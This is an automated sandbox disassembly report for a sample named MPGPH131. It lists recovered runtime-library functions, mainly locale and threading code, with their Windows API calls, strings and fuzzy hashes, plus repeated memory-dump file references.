Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: Handle$Close$Process$AddressCreateCurrentEventModuleProcString$AnsiObjectOpenResetSingleThreadUnicodeWait
String ID: File
API String ID: 3800441322-749574446
Opcode ID: 023fd1c83c5b7fc3437d01ddeefe0d0d986b893609edcfaedbdd372af587f8a4
Instruction ID: 9ef2f738bcd1f5ad8afe384794c0842c2bcb31849f21d9998f27885346bcb958
Opcode Fuzzy Hash: 023fd1c83c5b7fc3437d01ddeefe0d0d986b893609edcfaedbdd372af587f8a4
Instruction Fuzzy Hash: AEC1DE70D002489FDF15CFA4DD45BAEBBB6FF45300F10406DE909AB292E770A984DBA2

Function 0064B41B Relevance: 15.2, APIs: 10, Instructions: 200fileCOMMON

Download Yara Rule

APIs

GetFileAttributesExW.KERNEL32(?,00000000,?,?,?), ref: 0064B4B3
GetLastError.KERNEL32(?,?), ref: 0064B4BD
FindFirstFileW.KERNEL32(?,?,?,?), ref: 0064B4D4
GetLastError.KERNEL32(?,?), ref: 0064B4DF
FindClose.KERNEL32(00000000,?,?), ref: 0064B4EB
___std_fs_open_handle@16.LIBCPMT ref: 0064B5A4

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ErrorFileFindLast$AttributesCloseFirst___std_fs_open_handle@16
String ID:
API String ID: 2340820627-0
Opcode ID: f082f53864257c284923488ee1574ed18d60b235756e587150fc89b6009ddfc4
Instruction ID: 1f44d4dbd892cc042da00556544a7be278ad3c825b1f5cfcca071788bb88a6f2
Opcode Fuzzy Hash: f082f53864257c284923488ee1574ed18d60b235756e587150fc89b6009ddfc4
Instruction Fuzzy Hash: 4A71AF74A006199FDB64CF28DC84BE9B7BABF05320F145259E859E3390DB70DE51CB91

Function 0066DEC4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,00000000,?,?,?,0066E1D6,?,?), ref: 0066DF5D
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,?,0066E1D6,?,?), ref: 0066DF86
GetACP.KERNEL32(?,?,0066E1D6,?,?), ref: 0066DF9B

Strings

ACP, xrefs: 0066DEE2
OCP, xrefs: 0066DF18

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 79c7d47995b193324c58e5e75f8114ae7c659694a9d4b6726cc0bd538c67ef2b
Instruction ID: 582db58c97e3b72a6c2fc13f78f59d5fc296bd373acdf24ed7991e9530d96352
Opcode Fuzzy Hash: 79c7d47995b193324c58e5e75f8114ae7c659694a9d4b6726cc0bd538c67ef2b
Instruction Fuzzy Hash: DB218E72F00100AADB349F54C901BE777A7EF94B64B5A8564E90BDB311EB32DE81C390

Function 0066E0A0 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0066364B: GetLastError.KERNEL32(?,?,0065DD18,?,?,00000003,00652013,?,00651F82,?,00000016,00652191), ref: 0066364F
Part of subcall function 0066364B: SetLastError.KERNEL32(00000000,00000016,00652191,?,?,?,?,?,00000000,?,?,?,?,?,?,00572D8D), ref: 006636F1

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0066E1A8
IsValidCodePage.KERNEL32(?), ref: 0066E1E6
IsValidLocale.KERNEL32(?,00000001), ref: 0066E1F9
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0066E241
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 0066E25C

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 709ee7b6debb93d18019e9f73d863c524567b07cf52a2501fb9e25b9b7fdfc49
Instruction ID: fb3ce0a060b416d43efb0df03640acfce04c172d516f02590c8452a935629437
Opcode Fuzzy Hash: 709ee7b6debb93d18019e9f73d863c524567b07cf52a2501fb9e25b9b7fdfc49
Instruction Fuzzy Hash: D7518E75A00209ABEF10EFA5CC41AEAB3BEAF19700F144469E914EB291E7719A45CB61

Function 0066D72B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 254COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0066364B: GetLastError.KERNEL32(?,?,0065DD18,?,?,00000003,00652013,?,00651F82,?,00000016,00652191), ref: 0066364F
Part of subcall function 0066364B: SetLastError.KERNEL32(00000000,00000016,00652191,?,?,?,?,?,00000000,?,?,?,?,?,?,00572D8D), ref: 006636F1

GetACP.KERNEL32(?,?,?,?,?,?,00660A83,?,?,?,?,?,-00000050,?,?,?), ref: 0066D7EA
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00660A83,?,?,?,?,?,-00000050,?,?), ref: 0066D821
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 0066D984

Strings

utf8, xrefs: 0066D8F3

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: d178783fe878e5421caec7947fa4b3d8c89c68801f08b1d6f517acc1e223d25d
Instruction ID: 553310b9b14041d713b3b1d060bd604b726ea019522e66b7e3f86c415581c3bd
Opcode Fuzzy Hash: d178783fe878e5421caec7947fa4b3d8c89c68801f08b1d6f517acc1e223d25d
Instruction Fuzzy Hash: F371E472F00206AADB24AB74CC46BAA77AEEF45700F14452DF905DB282EB70ED41C7A5

Function 005DAE90 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 005DAEB3
std::_Lockit::_Lockit.LIBCPMT ref: 005DAED5
std::_Lockit::~_Lockit.LIBCPMT ref: 005DAEF5
std::_Lockit::~_Lockit.LIBCPMT ref: 005DAF1F
std::_Lockit::_Lockit.LIBCPMT ref: 005DAF8D
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 005DAFD9
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 005DAFF3
std::_Lockit::~_Lockit.LIBCPMT ref: 005DB088
std::_Facet_Register.LIBCPMT ref: 005DB095

Strings

bad locale name, xrefs: 005DB0AF

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
String ID: bad locale name
API String ID: 3375549084-1405518554
Opcode ID: bef9261acfba66b5efe00cbb0f19e2dd582883317f0af8d298bcd07358f77110
Instruction ID: 95b217e7cb6ff3b8aa36c639a565b4aac22c5bcd11fd66564ef9f96481def414
Opcode Fuzzy Hash: bef9261acfba66b5efe00cbb0f19e2dd582883317f0af8d298bcd07358f77110
Instruction Fuzzy Hash: 4D618DB5D00205DFDB60DFA8D885BAEBFB6BF05310F18445AE804A7381E734E905CBA6

Function 00573770 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 152COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 005737E9
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00573835
__Getctype.LIBCPMT ref: 0057384E
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0057386A
std::_Lockit::~_Lockit.LIBCPMT ref: 005738FF

Strings

0:W, xrefs: 00573848
bad locale name, xrefs: 0057391C

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: 0:W$bad locale name
API String ID: 1840309910-2737869779
Opcode ID: 9381c707c66c564f7b22c0fcbf03d88a6683722809032e7b28b59172383cee8e
Instruction ID: 92871af02441c2d2dcb8bca30dac6d47413c49ab72061fc45fe1b9bb92acdaf6
Opcode Fuzzy Hash: 9381c707c66c564f7b22c0fcbf03d88a6683722809032e7b28b59172383cee8e
Instruction Fuzzy Hash: E15150F1D012589BDF50DFA4D88579EFBB8AF14314F148169EC08AB341E775EA08DBA2

Function 00650880 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 006508B7
___except_validate_context_record.LIBVCRUNTIME ref: 006508BF
_ValidateLocalCookies.LIBCMT ref: 00650948
__IsNonwritableInCurrentImage.LIBCMT ref: 00650973
_ValidateLocalCookies.LIBCMT ref: 006509C8

Strings

Cd, xrefs: 00650965, 0065096E, 0065097F
csm, xrefs: 0065095D

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: Cd$csm
API String ID: 1170836740-2886570576
Opcode ID: fc7b2e5c92e692e5d36ecfa574e4b256b5d0de93c623f04b588b1cd24641c742
Instruction ID: 7b0b1f0043ee3c45a0ca33f4b0a8e3872e780dcc7e02a6078445eb5bb2915b21
Opcode Fuzzy Hash: fc7b2e5c92e692e5d36ecfa574e4b256b5d0de93c623f04b588b1cd24641c742
Instruction Fuzzy Hash: 6341C634A00209ABEF10DF68C880AEE7BB7BF45325F149559EC189B356D731EA49CB91

Function 0064C05E Relevance: 10.7, APIs: 7, Instructions: 153threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0064C086
GetCurrentThreadId.KERNEL32 ref: 0064C0A3
GetCurrentThreadId.KERNEL32 ref: 0064C0C4
GetCurrentThreadId.KERNEL32 ref: 0064C147
__Xtime_diff_to_millis2.LIBCPMT ref: 0064C15F
GetCurrentThreadId.KERNEL32 ref: 0064C18B
GetCurrentThreadId.KERNEL32 ref: 0064C1D1

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: CurrentThread$Xtime_diff_to_millis2
String ID:
API String ID: 1280559528-0
Opcode ID: 749ca56055c60945bda6b846443698de55d30dd82488773b17a6041d573482cd
Instruction ID: 0da9a2b0417093f916045043a3d97833515c8041a823d881dbaa521cc3f99ee0
Opcode Fuzzy Hash: 749ca56055c60945bda6b846443698de55d30dd82488773b17a6041d573482cd
Instruction Fuzzy Hash: AA515871901615CFCFA0DF24C8819A9B7B3BF48730B254459E80AAB352DB31ED81CBA4

Function 00664B87 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00664C96,00572D8D,?,00000000,?,?,?,00664EC0,00000022,FlsSetValue,00680AD8,00680AE0,?), ref: 00664C48

Strings

ext-ms-, xrefs: 00664BF2
api-ms-, xrefs: 00664BDE

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 35c8655a8166cb63a219cefae939d00e1fb114dcd510450ff51136c9be641ad1
Instruction ID: 758a5118883403a8ea0d240257c9e92e5990e10afc84155d3e66986894dce034
Opcode Fuzzy Hash: 35c8655a8166cb63a219cefae939d00e1fb114dcd510450ff51136c9be641ad1
Instruction Fuzzy Hash: 48210671A02225ABDB25EB65EC44B9B376BEB42774F251114E916A73D1DF30EF00CAD0

Function 0064C771 Relevance: 9.2, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001,?,?,006904B8,07FFFFFF,?,bad locale name), ref: 0064C7BA
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000,?,?,006904B8,07FFFFFF,?,bad locale name), ref: 0064C825
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,006904B8,07FFFFFF,?,bad locale name), ref: 0064C842
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,006904B8,07FFFFFF,?,bad locale name), ref: 0064C881
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,006904B8,07FFFFFF,?,bad locale name), ref: 0064C8E0
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,?,?,006904B8,07FFFFFF,?,bad locale name), ref: 0064C903

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: 8f0f12a281b30cb0afd653d75a48bc34250a669173de77d46a0661e8bde9ce20
Instruction ID: 2d7c3b42b0261af375db9a79780b1dbe691f12a95fa84a2751ac9bb1b5ce83d9
Opcode Fuzzy Hash: 8f0f12a281b30cb0afd653d75a48bc34250a669173de77d46a0661e8bde9ce20
Instruction Fuzzy Hash: 8851B07290220ABFEF609FA4CC45FEB7BABEF44760F154529F914A6351DB318D508B90

Function 005D9520 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 005D9543
std::_Lockit::_Lockit.LIBCPMT ref: 005D9566
std::_Lockit::~_Lockit.LIBCPMT ref: 005D9586
std::_Facet_Register.LIBCPMT ref: 005D95FB
std::_Lockit::~_Lockit.LIBCPMT ref: 005D9613
Concurrency::cancel_current_task.LIBCPMT ref: 005D962B

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 65c787b476747ab718782a2dd89a61d57f4a9bc7d45822146567b1edc279a298
Instruction ID: 640745403de66d693c2ed94f2d3ffdacf81087b1976a3c234d89e6f1447ee982
Opcode Fuzzy Hash: 65c787b476747ab718782a2dd89a61d57f4a9bc7d45822146567b1edc279a298
Instruction Fuzzy Hash: AC41DF71D002199FCB25EF58E840AAABBB5FF42320F14466AE9196B391D730EE05CBD1

Function 0065CBE3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,FAAA2064,?,?,00000000,0067ACB1,000000FF,?,0065CBBF,?,?,0065CB93,00000016), ref: 0065CC18
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0065CC2A
FreeLibrary.KERNEL32(00000000,?,00000000,0067ACB1,000000FF,?,0065CBBF,?,?,0065CB93,00000016), ref: 0065CC4C

Strings

CorExitProcess, xrefs: 0065CC22
mscoree.dll, xrefs: 0065CC11

Memory Dump Source

